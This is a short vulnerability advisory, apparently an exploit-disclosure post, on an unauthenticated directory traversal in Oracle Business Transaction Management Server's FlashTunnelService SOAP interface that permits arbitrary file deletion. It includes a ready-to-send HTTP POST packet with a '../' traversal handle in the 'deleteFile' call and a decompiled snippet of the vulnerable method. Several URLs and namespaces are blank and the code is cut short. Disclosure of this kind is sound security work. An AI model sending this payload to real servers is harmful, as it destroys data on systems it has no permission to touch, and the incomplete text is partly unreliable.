Oracle Business Transaction Management Server FlashTunnelService 
Remote File Deletion

tested against: Microsoft Windows Server 2003 r2 sp2
                Oracle WebLogic Server 12c (12.1.1)
                Oracle Business Transaction Management Server (Production version)

files tested: 
oepe-indigo-installer- (weblogic)
download url:       (BTM, production version) 
download url:

the mentioned product installs a web service 
called "FlashTunnelService" which can be reached
without prior authentication and processes incoming
SOAP requests.

It can be reached at the following uri:

This soap interface exposes the 'deleteFile' function
which could allow to delete arbitrary files with administrative
privileges on the target
server through a directory traversal vulnerability.
This could be useful for further attacks.

Example packet:

POST /btmui/soa/flash_svc/ HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
User-Agent: Jakarta Commons-HttpClient/3.1
Host: [host]:7001
Content-Length: [length]

<soapenv:Envelope xmlns:soapenv="" xmlns:int="" xmlns:typ="">
         <int:deleteFile handle="../../../../../../../../../../../../somepath/somefile.ext">

Vulnerable code, see the decompiled com.amberpoint.flashtunnel.impl.FlashTunnelServiceImpl class:
public IDeleteFileResponse deleteFile(IDeleteFileRequest request)
        throws SOAPFaultException
        DeleteFileResponse dfr = new DeleteFileResponse();
        String handle = request.getHandle();
        File f = getFileFromHandle(handle);
        if(f != null)
        return dfr;

As attachment, proof of concept code.